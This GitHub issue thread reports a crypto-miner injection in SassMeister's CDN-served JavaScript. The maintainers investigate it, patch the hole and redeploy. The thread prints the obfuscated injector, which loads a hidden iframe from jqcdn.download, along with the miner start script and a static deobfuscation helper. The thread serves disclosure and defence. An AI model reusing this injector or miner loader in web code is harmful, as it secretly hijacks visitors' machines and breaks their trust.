jedfoster / SassMeister

The Sass playground
http://sassmeister.com

Infected Website JS Script #194

Closed flexchar closed 6 years ago

flexchar commented 6 years ago

Came across your website loading a heavy iframe from the jqcdn.download domain. It looks like a crypto miner, though not sure.

The init code sits at the very end of your app-{hash}.min.js file.

// String table. The entries are out of order on purpose: the IIFE below rotates
// the array so that the hex indices used later line up with the right strings.
var _0xb185d4 = ["iframe", "setAttribute", "https://www.jqcdn.download/lot.html", "head", "appendChild", "1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1", "start", "createElement"];
// Rotate the table: x becomes 368, and the loop runs while --x is non-zero,
// i.e. 367 times. 367 % 8 == 7, so the net effect is one rotation to the right.
!function(t, x) {
    !function(x) {
        for (; --x; )
            t.push(t.shift())
    }(++x)
}(_0xb185d4, 367);
// Accessor: "0x3" - 0 coerces the hex string to 3, then reads the rotated table.
var _0xe799c5 = function(t, x) {
    var a = _0xb185d4[t -= 0];
    return a
};
// After resolving the lookups this reads:
//   a = document.createElement("iframe");
//   a.setAttribute("src", "https://www.jqcdn.download/lot.html");
//   document.head.appendChild(a);
// The 0px x 1px frame is effectively invisible to the user.
a = document[_0xe799c5("0x0")](_0xe799c5("0x1")),
a[_0xe799c5("0x2")]("src", _0xe799c5("0x3")),
a.style.width = "0px",
a.style.height = "1px",
document[_0xe799c5("0x4")][_0xe799c5("0x5")](a);

Then the iframe loads content from jqcdn.download/lot.html

<script src="https://www.jqcdn.download/ricewithchicken.js"></script>
<script>
  AsianRice.CONFIG.WEBSOCKET_SHARDS = [["wss://www.jqcdn.download:8893/proxy"]];
  var TexasChicken = new AsianRice.Anonymous("winner winner chicken dinner");
  TexasChicken.start();
</script>

Out of curiosity: the contents of ricewithchicken.js: https://pastebin.com/raw/JR7DHCeG and after base64 decryption here: https://pastebin.com/0kv9VWD5

Please take actions to clean up, or if it is done on purpose, inform your users.
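The snippet above uses a common pattern: one string table, rotated at load time, then read through an accessor that takes hex-string indices. The following is an added example (not part of the report and not SassMeister code) that replays that rotation and rewrites the accessor calls into plain strings, so the snippet can be read without executing it. The string table, the seed 367 and the accessor name `_0xe799c5` are taken from the report; the sample source excerpt is constructed from it.

```javascript
// Added example: resolve the "rotated string table" obfuscation used by the
// injected snippet. Not SassMeister code; runs offline on a constructed excerpt.

// String table copied from the reported snippet, in its original order.
const STRING_TABLE = [
  "iframe", "setAttribute", "https://www.jqcdn.download/lot.html", "head",
  "appendChild", "1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1", "start", "createElement",
];

// Replays `for (; --x; ) t.push(t.shift())` with x = seed + 1: the loop body
// runs `seed` times, each a left rotation, so only seed % length matters.
function rotateTable(table, seed) {
  const t = table.slice();
  const steps = seed % t.length; // 367 % 8 === 7
  for (let i = 0; i < steps; i++) t.push(t.shift());
  return t;
}

// Builds the accessor the snippet calls as _0xe799c5("0x3"): `t -= 0`
// coerces the hex string to a number, so "0x3" reads rotated[3].
function makeAccessor(table, seed) {
  const rotated = rotateTable(table, seed);
  return (idx) => rotated[idx - 0];
}

// Finds every accessorName("0x..") call in a source text and resolves it.
function resolveCalls(source, accessorName, table, seed) {
  const get = makeAccessor(table, seed);
  const escaped = accessorName.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(escaped + '\\("(0x[0-9a-fA-F]+)"\\)', "g");
  const out = [];
  let m;
  while ((m = re.exec(source)) !== null) out.push({ call: m[0], value: get(m[1]) });
  return out;
}

// Rewrites the source with each accessor call replaced by a quoted string.
function deobfuscate(source, accessorName, table, seed) {
  let text = source;
  for (const { call, value } of resolveCalls(source, accessorName, table, seed)) {
    text = text.split(call).join(JSON.stringify(value));
  }
  return text;
}

// Constructed excerpt of the reported snippet (the lines that do the work).
const SAMPLE = `a = document[_0xe799c5("0x0")](_0xe799c5("0x1")),
a[_0xe799c5("0x2")]("src", _0xe799c5("0x3")),
document[_0xe799c5("0x4")][_0xe799c5("0x5")](a);`;

console.log(deobfuscate(SAMPLE, "_0xe799c5", STRING_TABLE, 367));
```

The rotation count is the only thing that changes between copies of this stub (each injected file in this thread has a different array name and seed), so pasting a new table and seed into `rotateTable` is enough to read the next variant. Resolving statically, rather than evaluating the snippet in a sandbox, avoids running attacker code at all.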

Wadeck commented 6 years ago

After investigating this problem, I discovered that the code inside this repository is "clean". The code is injected after the gulp process is done. To be sure, I installed the package locally and did not find any trace of injected code.

But, if you reach the CDN and download the different files there, you will see that the following:

var _0x450c33=["iframe",...
var _0x659c05=["iframe",...
...

is injected into all *.js files, and this happened after minification, as this code is untouched.

@jedfoster can you give us more information about this security vulnerability?

From my PoV, the admin did not want to add this code, as it's injected everywhere. If (s)he wanted to keep it hidden, (s)he would have used some base64 encoding and injected it only in the app-<hash>.min.js. It seems more likely to be an automated attack.

jedfoster commented 6 years ago

I have no idea what’s going on here. I can state unequivocally that this script is not being loaded intentionally.

I’m away from my laptop right now and am unable to investigate further, but will as soon as I can.

Just as a sanity check, can you please verify and post here which sassmeister.com URLs this script is loading on? www.sassmeister.com (root URL) or www.sassmeister.com/gist/{gistId}. Considering the site loads GitHub gists, it's possible for someone to load third-party scripts on a gist page.

Wadeck commented 6 years ago

@jedfoster since you shut down the application, I was not able to download any script right now. But when I did the investigation, I checked the scripts served by your server and not the gist itself. It's app-f32392c07e.min.js directly that was changed. I followed the paths and downloaded them directly from the CDN you're using.

Here are the files I downloaded from the CDN in the JS directory (transformed into .txt to be accepted as an upload): app.min.js.txt, app.js.txt, embed-804a464ae4.js.txt, app-f32392c07e.js.txt, embed.js.txt

As you can see, the injected JS is always at the end of the files, for all of them.

Thank you for the quick answer. This is really annoying as a user, and I hope you will not lose too many frequent users due to this attack.

jedfoster commented 6 years ago

Ok. I have nuked the offending code, found and patched the security hole those motherf*ckers took advantage of, built a new S3 bucket for the assets to serve from, and rebuilt and redeployed the app. sassmeister.com should be good as new.

I feel awful that this issue has been sitting open for 3 weeks! Don't know why, but I didn't see it until today. I'm angry at the motherf*ckers who took advantage of a security hole and then took advantage of my users. But I'm even angrier at myself for leaving such a stupid hole open in the first place.

@Wadeck I am incredibly grateful to you for reaching out on Twitter. Thank you!

@flexchar I am so sorry I didn't see this when you reported it. I will keep a closer eye on my GitHub issues going forward.